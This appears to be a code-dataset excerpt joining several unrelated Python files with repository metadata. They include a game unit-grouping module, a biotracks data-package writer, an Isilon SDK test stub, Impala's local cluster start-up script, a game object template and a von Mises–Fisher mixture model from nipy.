self._addGroup(Group(self, self.ORDER_EXPLORE, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_EXPLORE"))
self._addGroup(Group(self, self.ORDER_AUTO_BUILD, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_BUILD"))
self._addGroup(Group(self, self.ORDER_AUTO_NETWORK, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_NETWORK"))
self._addGroup(Group(self, self.ORDER_AUTO_CITY, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_CITY"))
self._addGroup(Group(self, self.ORDER_AUTO_RELIGION, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_AUTO_RELIGION"))
self._addGroup(Group(self, self.ORDER_OTHER, "TXT_KEY_UNIT_GROUPER_ORDER_GROUP_OTHER"))
def calcGroupKeys(self, unit, player, team):
eOrder = UnitUtil.getOrder(unit)
if eOrder >= self.ORDER_OTHER:
return (self.ORDER_OTHER,)
else:
return (eOrder,)
class StandardGrouper(Grouper):
def __init__(self):
Grouper.__init__(self)
self._addGrouping(UnitTypeGrouping())
self._addGrouping(UnitCombatGrouping())
self._addGrouping(LevelGrouping())
self._addGrouping(PromotionGrouping())
self._addGrouping(LocationGrouping())
self._addGrouping(OrderGrouping())
# Classes for tracking stats about groups and units
class GrouperStats:
"""
Holds stats for a set of groupings.
"""
def __init__(self, grouper):
self.grouper = grouper
self.groupings = {}
for grouping in self.grouper.groupings:
self._addGrouping(GroupingStats(grouping))
def _addGrouping(self, grouping):
self.groupings[grouping.grouping.key] = grouping
def processUnit(self, player, team, unit):
stats = UnitStats(unit.getOwner(), unit.getID(), unit)
for grouping in self.groupings.itervalues():
grouping._processUnit(player, team, stats)
return stats
def getGrouping(self, key):
if key in self.groupings:
return self.groupings[key]
else:
return None
def itergroupings(self):
return self.groupings.itervalues()
class GroupingStats:
"""
Holds stats for a grouping.
"""
def __init__(self, grouping):
self.grouping = grouping
self.groups = {}
for group in self.grouping.groups.itervalues():
self._addGroup(GroupStats(group))
def _addGroup(self, group):
self.groups[group.group.key] = group
def _processUnit(self, player, team, unitStats):
keys = self.grouping.calcGroupKeys(unitStats.unit, player, team)
for key in keys:
self.groups[key]._addUnit(unitStats)
def itergroups(self):
return self.groups.itervalues()
class GroupStats:
"""
Holds stats for a group of units.
"""
def __init__(self, group):
self.group = group
self.units = set()
def _addUnit(self, unitStats):
self.units.add(unitStats)
def title(self):
return self.group.title
def size(self):
return len(self.units)
def isEmpty(self):
return self.size() == 0
class UnitStats:
"""
Holds stats about a single unit.
"""
def __init__(self, playerId, unitId, unit):
self.key = (playerId, unitId)
self.unit = unit
def __hash__(self):
return hash(self.key)
def __eq__(self, other):
return self.key == other.key
| 29.822335 | 125 | 0.743574 |
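Stripped of the Civ4 unit API, the Grouper/GrouperStats machinery above boils down to classify-and-count: each grouping maps a unit to one or more group keys, and the stats layer collects unit ids per key. A toy sketch of that core idea (the function name and the dict-based units are hypothetical):
from collections import defaultdict
def group_units(units, groupings):
    # groupings: name -> function(unit) returning an iterable of group keys.
    stats = {name: defaultdict(set) for name in groupings}
    for unit in units:
        for name, calc_keys in groupings.items():
            for key in calc_keys(unit):
                stats[name][key].add(unit["id"])
    return stats
units = [
    {"id": 1, "type": "warrior", "level": 2, "promos": ["combat1"]},
    {"id": 2, "type": "archer", "level": 1, "promos": []},
]
groupings = {
    "type": lambda u: (u["type"],),
    "level": lambda u: (u["level"],),
    "promo": lambda u: u["promos"] or ("none",),
}
stats = group_units(units, groupings)
print({name: {key: len(ids) for key, ids in groups.items()} for name, groups in stats.items()})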
69a5ae3999413d7872c2555766cda7fb0cfbd396
| 3,480 |
py
|
Python
|
biotracks/createdp.py
|
sbesson/biotracks
|
1adc6f954e2a29fcc250c45e7b463752d06dd5ab
|
[
"BSD-2-Clause"
] | 10 |
2017-05-24T07:41:04.000Z
|
2019-10-28T14:32:01.000Z
|
biotracks/createdp.py
|
pcmasuzzo/dpkg
|
5c7d067232f10c786c85b96b18cc56dd7d6d019f
|
[
"BSD-2-Clause"
] | 40 |
2017-05-02T16:30:42.000Z
|
2020-04-30T13:19:35.000Z
|
biotracks/createdp.py
|
pcmasuzzo/dpkg
|
5c7d067232f10c786c85b96b18cc56dd7d6d019f
|
[
"BSD-2-Clause"
] | 6 |
2017-06-19T13:55:28.000Z
|
2018-09-18T09:03:45.000Z
|
# #%L
# Copyright (c) 2016-2017 Cell Migration Standardisation Organization
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# #L%
import json
import csv
import os
import re
import datapackage
from jsontableschema import infer
from . import cmso, config
from .utils import get_logger, mkdir_p
# https://specs.frictionlessdata.io/data-package/#metadata
NAME_PATTERN = re.compile(r"^[a-z0-9_.-]+$")
FOREIGN_KEYS = [{
"fields": cmso.OBJECT_ID,
"reference": {
"datapackage": "",
"resource": cmso.OBJECTS_TABLE,
"fields": cmso.OBJECT_ID
}
}]
def infer_from_df(df, **kwargs):
# df.iterrows does not preserve types
h = df.head()
fields = list(df)
iterrows = ([str(h[_].values[i]) for _ in fields]
for i in range(h.shape[0]))
return infer(fields, iterrows, **kwargs)
def to_json(dp):
return json.dumps(dp.to_dict(), indent=4, sort_keys=True)
def create(reader, out_dir, log_level=None):
logger = get_logger("createdp.create", level=log_level)
top_level_dict = reader.conf[config.TOP_LEVEL]
try:
name = top_level_dict["name"]
except KeyError:
raise ValueError("'name' is a required property")
if not NAME_PATTERN.match(name):
raise ValueError("invalid name: %r" % (name,))
dp = datapackage.DataPackage()
for k, v in top_level_dict.items():
dp.descriptor[k] = v
dp.descriptor['resources'] = []
mkdir_p(out_dir)
logger.info("writing to '%s'", out_dir)
for a in "objects", "links":
out_bn = "%s.csv" % a
out_fn = os.path.join(out_dir, out_bn)
df = getattr(reader, a)
df.to_csv(out_fn, index=False, quoting=csv.QUOTE_NONE)
if a == "objects":
name = cmso.OBJECTS_TABLE
infer_kwargs = {"primary_key": cmso.OBJECT_ID}
else:
name = cmso.LINKS_TABLE
infer_kwargs = {}
schema = infer_from_df(df, **infer_kwargs)
if a == "links":
schema['foreignKeys'] = FOREIGN_KEYS
res = {"name": name, "path": out_bn, "schema": schema}
dp.descriptor['resources'].append(res)
with open(os.path.join(out_dir, 'dp.json'), 'w') as f:
f.write(to_json(dp) + '\n')
return dp
| 35.876289 | 78 | 0.682471 |
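The name check in create() above follows the Frictionless Data rule that a package name may only contain lowercase alphanumerics plus '_', '.' and '-'. A quick standalone illustration of the same pattern (the sample names are made up):
import re
NAME_PATTERN = re.compile(r"^[a-z0-9_.-]+$")
for name in ("cell_tracks-01", "Cell Tracks", "tracks.v2"):
    print(name, "->", "ok" if NAME_PATTERN.match(name) else "invalid")
# cell_tracks-01 -> ok, Cell Tracks -> invalid, tracks.v2 -> ok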
c834796649da4ccb7176af438c1217c012994d6f
| 902 |
py
|
Python
|
isi_sdk_8_0_1/test/test_antivirus_server.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 24 |
2018-06-22T14:13:23.000Z
|
2022-03-23T01:21:26.000Z
|
isi_sdk_8_0_1/test/test_antivirus_server.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 46 |
2018-04-30T13:28:22.000Z
|
2022-03-21T21:11:07.000Z
|
isi_sdk_8_0_1/test/test_antivirus_server.py
|
mohitjain97/isilon_sdk_python
|
a371f438f542568edb8cda35e929e6b300b1177c
|
[
"Unlicense"
] | 29 |
2018-06-19T00:14:04.000Z
|
2022-02-08T17:51:19.000Z
|
# coding: utf-8
"""
Isilon SDK
Isilon SDK - Language bindings for the OneFS API # noqa: E501
OpenAPI spec version: 4
Contact: sdk@isilon.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import isi_sdk_8_0_1
from isi_sdk_8_0_1.models.antivirus_server import AntivirusServer # noqa: E501
from isi_sdk_8_0_1.rest import ApiException
class TestAntivirusServer(unittest.TestCase):
"""AntivirusServer unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testAntivirusServer(self):
"""Test AntivirusServer"""
# FIXME: construct object with mandatory attributes with example values
# model = isi_sdk_8_0_1.models.antivirus_server.AntivirusServer() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| 22 | 87 | 0.7051 |
2b42959576884c0c390ecf9837aeae4f42e29e4f
| 18,759 |
py
|
Python
|
bin/start-impala-cluster.py
|
im0nk3y/Impala
|
f40f81639d0121925b71a1cbb85e1c9c51230058
|
[
"Apache-2.0"
] | null | null | null |
bin/start-impala-cluster.py
|
im0nk3y/Impala
|
f40f81639d0121925b71a1cbb85e1c9c51230058
|
[
"Apache-2.0"
] | null | null | null |
bin/start-impala-cluster.py
|
im0nk3y/Impala
|
f40f81639d0121925b71a1cbb85e1c9c51230058
|
[
"Apache-2.0"
] | 1 |
2018-08-22T15:33:23.000Z
|
2018-08-22T15:33:23.000Z
|
#!/usr/bin/env impala-python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# Starts up an Impala cluster (ImpalaD + State Store) with the specified number of
# ImpalaD instances. Each ImpalaD runs on a different port allowing this to be run
# on a single machine.
import os
import psutil
import sys
from getpass import getuser
from time import sleep, time
from optparse import OptionParser
from testdata.common import cgroups
KUDU_MASTER_HOSTS = os.getenv('KUDU_MASTER_HOSTS', '127.0.0.1')
DEFAULT_IMPALA_MAX_LOG_FILES = os.environ.get('IMPALA_MAX_LOG_FILES', 10)
# Options
parser = OptionParser()
parser.add_option("-s", "--cluster_size", type="int", dest="cluster_size", default=3,
help="Size of the cluster (number of impalad instances to start).")
parser.add_option("-c", "--num_coordinators", type="int", dest="num_coordinators",
default=3, help="Number of coordinators.")
parser.add_option("--use_exclusive_coordinators", dest="use_exclusive_coordinators",
action="store_true", default=False, help="If true, coordinators only "
"coordinate queries and execute coordinator fragments. If false, "
"coordinators also act as executors.")
parser.add_option("--build_type", dest="build_type", default= 'latest',
help="Build type to use - debug / release / latest")
parser.add_option("--impalad_args", dest="impalad_args", action="append", type="string",
default=[],
help="Additional arguments to pass to each Impalad during startup")
parser.add_option("--state_store_args", dest="state_store_args", action="append",
type="string", default=[],
help="Additional arguments to pass to State Store during startup")
parser.add_option("--catalogd_args", dest="catalogd_args", action="append",
type="string", default=[],
help="Additional arguments to pass to the Catalog Service at startup")
parser.add_option("--kill", "--kill_only", dest="kill_only", action="store_true",
default=False, help="Instead of starting the cluster, just kill all"
" the running impalads and the statestored.")
parser.add_option("--force_kill", dest="force_kill", action="store_true", default=False,
help="Force kill impalad and statestore processes.")
parser.add_option("-r", "--restart_impalad_only", dest="restart_impalad_only",
action="store_true", default=False,
help="Restarts only the impalad processes")
parser.add_option("--in-process", dest="inprocess", action="store_true", default=False,
help="Start all Impala backends and state store in a single process.")
parser.add_option("--log_dir", dest="log_dir",
default=os.environ['IMPALA_CLUSTER_LOGS_DIR'],
help="Directory to store output logs to.")
parser.add_option('--max_log_files', default=DEFAULT_IMPALA_MAX_LOG_FILES,
help='Max number of log files before rotation occurs.')
parser.add_option("-v", "--verbose", dest="verbose", action="store_true", default=False,
help="Prints all output to stderr/stdout.")
parser.add_option("--wait_for_cluster", dest="wait_for_cluster", action="store_true",
default=False, help="Wait until the cluster is ready to accept "
"queries before returning.")
parser.add_option("--log_level", type="int", dest="log_level", default=1,
help="Set the impalad backend logging level")
parser.add_option("--jvm_args", dest="jvm_args", default="",
help="Additional arguments to pass to the JVM(s) during startup.")
parser.add_option("--kudu_master_hosts", default=KUDU_MASTER_HOSTS,
help="The host name or address of the Kudu master. Multiple masters "
"can be specified using a comma separated list.")
options, args = parser.parse_args()
IMPALA_HOME = os.environ['IMPALA_HOME']
KNOWN_BUILD_TYPES = ['debug', 'release', 'latest']
IMPALAD_PATH = os.path.join(IMPALA_HOME,
'bin/start-impalad.sh -build_type=%s' % options.build_type)
STATE_STORE_PATH = os.path.join(IMPALA_HOME,
'bin/start-statestored.sh -build_type=%s' % options.build_type)
CATALOGD_PATH = os.path.join(IMPALA_HOME,
'bin/start-catalogd.sh -build_type=%s' % options.build_type)
MINI_IMPALA_CLUSTER_PATH = IMPALAD_PATH + " -in-process"
IMPALA_SHELL = os.path.join(IMPALA_HOME, 'bin/impala-shell.sh')
IMPALAD_PORTS = ("-beeswax_port=%d -hs2_port=%d -be_port=%d "
"-state_store_subscriber_port=%d -webserver_port=%d")
JVM_ARGS = "-jvm_debug_port=%s -jvm_args=%s"
BE_LOGGING_ARGS = "-log_filename=%s -log_dir=%s -v=%s -logbufsecs=5 -max_log_files=%s"
CLUSTER_WAIT_TIMEOUT_IN_SECONDS = 240
# Kills have a timeout to prevent automated scripts from hanging indefinitely.
# It is set to a high value to avoid failing if processes are slow to shut down.
KILL_TIMEOUT_IN_SECONDS = 240
def find_user_processes(binaries):
"""Returns an iterator over all processes owned by the current user with a matching
binary name from the provided list."""
for pid in psutil.get_pid_list():
try:
process = psutil.Process(pid)
if process.username == getuser() and process.name in binaries: yield process
except KeyError, e:
if "uid not found" not in str(e):
raise
except psutil.NoSuchProcess, e:
# Ignore the case when a process no longer exists.
pass
def check_process_exists(binary, attempts=1):
"""Checks if a process exists given the binary name. The `attempts` count allows us to
control the time a process needs to settle until it becomes available. After each try
the script will sleep for one second and retry. Returns True if it exists and False
otherwise.
"""
for _ in range(attempts):
for proc in find_user_processes([binary]):
return True
sleep(1)
return False
def exec_impala_process(cmd, args, stderr_log_file_path):
redirect_output = str()
if options.verbose:
args += ' -logtostderr=1'
else:
redirect_output = "1>%s" % stderr_log_file_path
cmd = '%s %s %s 2>&1 &' % (cmd, args, redirect_output)
os.system(cmd)
def kill_cluster_processes(force=False):
binaries = ['catalogd', 'impalad', 'statestored', 'mini-impala-cluster']
kill_matching_processes(binaries, force)
def kill_matching_processes(binary_names, force=False):
"""Kills all processes with the given binary name, waiting for them to exit"""
# Send all the signals before waiting so that processes can clean up in parallel.
processes = list(find_user_processes(binary_names))
for process in processes:
try:
if force:
process.kill()
else:
process.terminate()
except psutil.NoSuchProcess:
pass
for process in processes:
try:
process.wait(KILL_TIMEOUT_IN_SECONDS)
except psutil.TimeoutExpired:
raise RuntimeError("Unable to kill %s (pid %d) after %d seconds." % (process.name,
process.pid, KILL_TIMEOUT_IN_SECONDS))
def start_statestore():
print "Starting State Store logging to %s/statestored.INFO" % options.log_dir
stderr_log_file_path = os.path.join(options.log_dir, "statestore-error.log")
args = "%s %s" % (build_impalad_logging_args(0, "statestored"),
" ".join(options.state_store_args))
exec_impala_process(STATE_STORE_PATH, args, stderr_log_file_path)
if not check_process_exists("statestored", 10):
raise RuntimeError("Unable to start statestored. Check log or file permissions"
" for more details.")
def start_catalogd():
print "Starting Catalog Service logging to %s/catalogd.INFO" % options.log_dir
stderr_log_file_path = os.path.join(options.log_dir, "catalogd-error.log")
args = "%s %s %s" % (build_impalad_logging_args(0, "catalogd"),
" ".join(options.catalogd_args),
build_jvm_args(options.cluster_size))
exec_impala_process(CATALOGD_PATH, args, stderr_log_file_path)
if not check_process_exists("catalogd", 10):
raise RuntimeError("Unable to start catalogd. Check log or file permissions"
" for more details.")
def start_mini_impala_cluster(cluster_size):
print ("Starting in-process Impala Cluster logging "
"to %s/mini-impala-cluster.INFO" % options.log_dir)
args = "-num_backends=%s %s" %\
(cluster_size, build_impalad_logging_args(0, 'mini-impala-cluster'))
stderr_log_file_path = os.path.join(options.log_dir, 'mini-impala-cluster-error.log')
exec_impala_process(MINI_IMPALA_CLUSTER_PATH, args, stderr_log_file_path)
def build_impalad_port_args(instance_num):
BASE_BEESWAX_PORT = 21000
BASE_HS2_PORT = 21050
BASE_BE_PORT = 22000
BASE_STATE_STORE_SUBSCRIBER_PORT = 23000
BASE_WEBSERVER_PORT = 25000
return IMPALAD_PORTS % (BASE_BEESWAX_PORT + instance_num, BASE_HS2_PORT + instance_num,
BASE_BE_PORT + instance_num,
BASE_STATE_STORE_SUBSCRIBER_PORT + instance_num,
BASE_WEBSERVER_PORT + instance_num)
def build_impalad_logging_args(instance_num, service_name):
return BE_LOGGING_ARGS % (service_name, options.log_dir, options.log_level,
options.max_log_files)
def build_jvm_args(instance_num):
BASE_JVM_DEBUG_PORT = 30000
return JVM_ARGS % (BASE_JVM_DEBUG_PORT + instance_num, options.jvm_args)
def start_impalad_instances(cluster_size, num_coordinators, use_exclusive_coordinators):
"""Start 'cluster_size' impalad instances. The first 'num_coordinator' instances will
act as coordinators. 'use_exclusive_coordinators' specifies whether the coordinators
will only execute coordinator fragments."""
if cluster_size == 0:
# No impalad instances should be started.
return
# The default memory limit for an impalad is 80% of the total system memory. On a
# mini-cluster with 3 impalads that means 240%. Since having an impalad be OOM killed
# is very annoying, the mem limit will be reduced. This can be overridden using the
# --impalad_args flag. virtual_memory().total returns the total physical memory.
mem_limit = int(0.8 * psutil.virtual_memory().total / cluster_size)
# Start each impalad instance and optionally redirect the output to a log file.
for i in range(cluster_size):
if i == 0:
# The first impalad always logs to impalad.INFO
service_name = "impalad"
else:
service_name = "impalad_node%s" % i
# Sleep between instance startup: simultaneous starts hurt the minikdc
# Yes, this is a hack, but it's easier than modifying the minikdc...
# TODO: is this really necessary?
sleep(1)
print "Starting Impala Daemon logging to %s/%s.INFO" % (options.log_dir,
service_name)
# impalad args from the --impalad_args flag. Also replacing '#ID' with the instance.
param_args = (" ".join(options.impalad_args)).replace("#ID", str(i))
args = "--mem_limit=%s %s %s %s %s" %\
(mem_limit, # Goes first so --impalad_args will override it.
build_impalad_logging_args(i, service_name), build_jvm_args(i),
build_impalad_port_args(i), param_args)
if options.kudu_master_hosts:
# Must be prepended, otherwise the java options interfere.
args = "-kudu_master_hosts %s %s" % (options.kudu_master_hosts, args)
if i >= num_coordinators:
args = "-is_coordinator=false %s" % (args)
elif use_exclusive_coordinators:
# Coordinator instance that doesn't execute non-coordinator fragments
args = "-is_executor=false %s" % (args)
stderr_log_file_path = os.path.join(options.log_dir, '%s-error.log' % service_name)
exec_impala_process(IMPALAD_PATH, args, stderr_log_file_path)
def wait_for_impala_process_count(impala_cluster, retries=10):
"""Checks that the desired number of impalad/statestored processes are running.
Refresh until the number running impalad/statestored processes reaches the expected
number based on CLUSTER_SIZE, or the retry limit is hit. Failing this, raise a
RuntimeError.
"""
for i in range(retries):
if len(impala_cluster.impalads) < options.cluster_size or \
not impala_cluster.statestored or not impala_cluster.catalogd:
sleep(1)
impala_cluster.refresh()
msg = str()
if len(impala_cluster.impalads) < options.cluster_size:
impalads_found = len(impala_cluster.impalads)
msg += "Expected %d impalad(s), only %d found\n" %\
(options.cluster_size, impalads_found)
if not impala_cluster.statestored:
msg += "statestored failed to start.\n"
if not impala_cluster.catalogd:
msg += "catalogd failed to start.\n"
if msg:
raise RuntimeError(msg)
def wait_for_cluster_web(timeout_in_seconds=CLUSTER_WAIT_TIMEOUT_IN_SECONDS):
"""Checks if the cluster is "ready"
A cluster is deemed "ready" if:
- All backends are registered with the statestore.
- Each impalad knows about all other impalads.
This information is retrieved by querying the statestore debug webpage
and each individual impalad's metrics webpage.
"""
impala_cluster = ImpalaCluster()
# impalad processes may take a while to come up.
wait_for_impala_process_count(impala_cluster)
for impalad in impala_cluster.impalads:
impalad.service.wait_for_num_known_live_backends(options.cluster_size,
timeout=CLUSTER_WAIT_TIMEOUT_IN_SECONDS, interval=2)
if impalad._get_arg_value('is_coordinator', default='true') == 'true':
wait_for_catalog(impalad, timeout_in_seconds=CLUSTER_WAIT_TIMEOUT_IN_SECONDS)
def wait_for_catalog(impalad, timeout_in_seconds):
"""Waits for the impalad catalog to become ready"""
start_time = time()
catalog_ready = False
attempt = 0
while (time() - start_time < timeout_in_seconds and not catalog_ready):
try:
num_dbs = impalad.service.get_metric_value('catalog.num-databases')
num_tbls = impalad.service.get_metric_value('catalog.num-tables')
catalog_ready = impalad.service.get_metric_value('catalog.ready')
if catalog_ready or attempt % 4 == 0:
print 'Waiting for Catalog... Status: %s DBs / %s tables (ready=%s)' %\
(num_dbs, num_tbls, catalog_ready)
attempt += 1
except Exception, e:
print e
sleep(0.5)
if not catalog_ready:
raise RuntimeError('Catalog was not initialized in expected time period.')
def wait_for_cluster_cmdline(timeout_in_seconds=CLUSTER_WAIT_TIMEOUT_IN_SECONDS):
"""Checks if the cluster is "ready" by executing a simple query in a loop"""
start_time = time()
while os.system('%s -i localhost:21000 -q "%s"' % (IMPALA_SHELL, 'select 1')) != 0:
if time() - timeout_in_seconds > start_time:
raise RuntimeError('Cluster did not start within %d seconds' % timeout_in_seconds)
print 'Cluster not yet available. Sleeping...'
sleep(2)
if __name__ == "__main__":
if options.kill_only:
kill_cluster_processes(force=options.force_kill)
sys.exit(0)
if options.build_type not in KNOWN_BUILD_TYPES:
print 'Invalid build type %s' % options.build_type
print 'Valid values: %s' % ', '.join(KNOWN_BUILD_TYPES)
sys.exit(1)
if options.cluster_size < 0:
print 'Please specify a cluster size >= 0'
sys.exit(1)
if options.num_coordinators <= 0:
print 'Please specify a valid number of coordinators > 0'
sys.exit(1)
if options.use_exclusive_coordinators and options.num_coordinators >= options.cluster_size:
print 'Cannot start an Impala cluster with no executors'
sys.exit(1)
if not os.path.isdir(options.log_dir):
print 'Log dir does not exist or is not a directory: %s' % options.log_dir
sys.exit(1)
# Kill existing cluster processes based on the current configuration.
if options.restart_impalad_only:
if options.inprocess:
print 'Cannot perform individual component restarts using an in-process cluster'
sys.exit(1)
kill_matching_processes(['impalad'], force=options.force_kill)
else:
kill_cluster_processes(force=options.force_kill)
try:
import json
wait_for_cluster = wait_for_cluster_web
except ImportError:
print "json module not found, checking for cluster startup through the command-line"
wait_for_cluster = wait_for_cluster_cmdline
# If ImpalaCluster cannot be imported, fall back to the command-line to check
# whether impalads/statestore are up.
try:
from tests.common.impala_cluster import ImpalaCluster
if options.restart_impalad_only:
impala_cluster = ImpalaCluster()
if not impala_cluster.statestored or not impala_cluster.catalogd:
print 'No running statestored or catalogd detected. Restarting entire cluster.'
options.restart_impalad_only = False
except ImportError:
print 'ImpalaCluster module not found.'
# TODO: Update this code path to work similar to the ImpalaCluster code path when
# restarting only impalad processes. Specifically, we should do a full cluster
# restart if either the statestored or catalogd processes are down, even if
# restart_only_impalad=True.
wait_for_cluster = wait_for_cluster_cmdline
if options.inprocess:
# The statestore and the impalads start in the same process.
start_mini_impala_cluster(options.cluster_size)
wait_for_cluster_cmdline()
else:
try:
if not options.restart_impalad_only:
start_statestore()
start_catalogd()
start_impalad_instances(options.cluster_size, options.num_coordinators,
options.use_exclusive_coordinators)
# Sleep briefly to reduce log spam: the cluster takes some time to start up.
sleep(3)
wait_for_cluster()
except Exception, e:
print 'Error starting cluster: %s' % e
sys.exit(1)
print 'Impala Cluster Running with %d nodes and %d coordinators.' % (
options.cluster_size, options.num_coordinators)
| 45.642336 | 93 | 0.712298 |
dccf2e0af1754ed81394a72acb053a98eb4ead3b
| 437 |
py
|
Python
|
data/scripts/templates/object/tangible/lair/murra/shared_lair_murra.py
|
obi-two/GameServer
|
7d37024e2291a97d49522610cd8f1dbe5666afc2
|
[
"MIT"
] | 20 |
2015-02-23T15:11:56.000Z
|
2022-03-18T20:56:48.000Z
|
data/scripts/templates/object/tangible/lair/murra/shared_lair_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | null | null | null |
data/scripts/templates/object/tangible/lair/murra/shared_lair_murra.py
|
apathyboy/swganh
|
665128efe9154611dec4cb5efc61d246dd095984
|
[
"MIT"
] | 20 |
2015-04-04T16:35:59.000Z
|
2022-03-24T14:54:37.000Z
|
#### NOTICE: THIS FILE IS AUTOGENERATED
#### MODIFICATIONS MAY BE LOST IF DONE IMPROPERLY
#### PLEASE SEE THE ONLINE DOCUMENTATION FOR EXAMPLES
from swgpy.object import *
def create(kernel):
result = Tangible()
result.template = "object/tangible/lair/murra/shared_lair_murra.iff"
result.attribute_template_id = -1
result.stfName("lair_n","murra")
#### BEGIN MODIFICATIONS ####
#### END MODIFICATIONS ####
return result
| 25.705882 | 69 | 0.718535 |
c5cc5495d894deffd11e576f414b0c3d09eac59b
| 64 |
py
|
Python
|
epytodo_2017/lib/python3.6/copy.py
|
ltabis/epitech-projects
|
e38b3f00a4ac44c969d5e4880cd65084dc2c870a
|
[
"MIT"
] | null | null | null |
epytodo_2017/lib/python3.6/copy.py
|
ltabis/epitech-projects
|
e38b3f00a4ac44c969d5e4880cd65084dc2c870a
|
[
"MIT"
] | null | null | null |
epytodo_2017/lib/python3.6/copy.py
|
ltabis/epitech-projects
|
e38b3f00a4ac44c969d5e4880cd65084dc2c870a
|
[
"MIT"
] | 1 |
2021-01-07T17:41:14.000Z
|
2021-01-07T17:41:14.000Z
|
IntxLNK/usr/lib64/python3.6/copy.py
| 64 | 64 | 0.453125 |
f59218e14f693924b645493166ea31bff2cd6bca
| 13,299 |
py
|
Python
|
nipy/algorithms/clustering/von_mises_fisher_mixture.py
|
neurospin/nipy
|
cc54600a0dca1e003ad393bc05c46f91eef30a68
|
[
"BSD-3-Clause"
] | 1 |
2016-03-08T15:01:06.000Z
|
2016-03-08T15:01:06.000Z
|
nipy/algorithms/clustering/von_mises_fisher_mixture.py
|
neurospin/nipy
|
cc54600a0dca1e003ad393bc05c46f91eef30a68
|
[
"BSD-3-Clause"
] | null | null | null |
nipy/algorithms/clustering/von_mises_fisher_mixture.py
|
neurospin/nipy
|
cc54600a0dca1e003ad393bc05c46f91eef30a68
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Implementation of Von-Mises-Fisher Mixture models,
i.e. the equivalent of a mixture of Gaussians on the sphere.
Author: Bertrand Thirion, 2010-2011
"""
import numpy as np
class VonMisesMixture(object):
"""
Model for Von Mises mixture distribution with fixed variance
on a two-dimensional sphere
"""
def __init__(self, k, precision, means=None, weights=None,
null_class=False):
""" Initialize Von Mises mixture
Parameters
----------
k: int,
number of components
precision: float,
the fixed precision parameter
means: array of shape(self.k, 3), optional
input component centers
weights: array of shape(self.k), optional
input components weights
null_class: bool, optional
Inclusion of a null class within the model
(related to k=0)
fixme
-----
consistency checks
"""
self.k = k
self.dim = 2
self.em_dim = 3
self.means = means
self.precision = precision
self.weights = weights
self.null_class = null_class
def log_density_per_component(self, x):
"""Compute the per-component density of the data
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
Returns
-------
        like: array of shape(n, self.k), with non-negative values
the density
"""
n = x.shape[0]
constant = self.precision / (2 * np.pi * (1 - np.exp( - \
2 * self.precision)))
loglike = np.log(constant) + \
(np.dot(x, self.means.T) - 1) * self.precision
if self.null_class:
loglike = np.hstack((np.log(1. / (4 * np.pi)) * np.ones((n, 1)),
loglike))
return loglike
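    # For reference, the expression above is the log of the von Mises-Fisher
    # density on the 2-sphere with fixed concentration kappa = self.precision:
    #
    #     f(x; mu, kappa) = kappa / (2 * pi * (1 - exp(-2 * kappa)))
    #                       * exp(kappa * (dot(mu, x) - 1))
    #
    # i.e. the usual kappa / (4 * pi * sinh(kappa)) * exp(kappa * dot(mu, x)),
    # rewritten so that no exp(kappa) factor can overflow for large kappa.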
def density_per_component(self, x):
"""
Compute the per-component density of the data
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
Returns
-------
        like: array of shape(n, self.k), with non-negative values
the density
"""
return np.exp(self.log_density_per_component(x))
def weighted_density(self, x):
""" Return weighted density
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
Returns
-------
like: array
of shape(n, self.k)
"""
return(self.density_per_component(x) * self.weights)
def log_weighted_density(self, x):
""" Return log weighted density
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
Returns
-------
log_like: array of shape(n, self.k)
"""
return(self.log_density_per_component(x) + np.log(self.weights))
def mixture_density(self, x):
""" Return mixture density
Parameters
----------
        x: array of shape(n,3)
should be on the unit sphere
Returns
-------
like: array of shape(n)
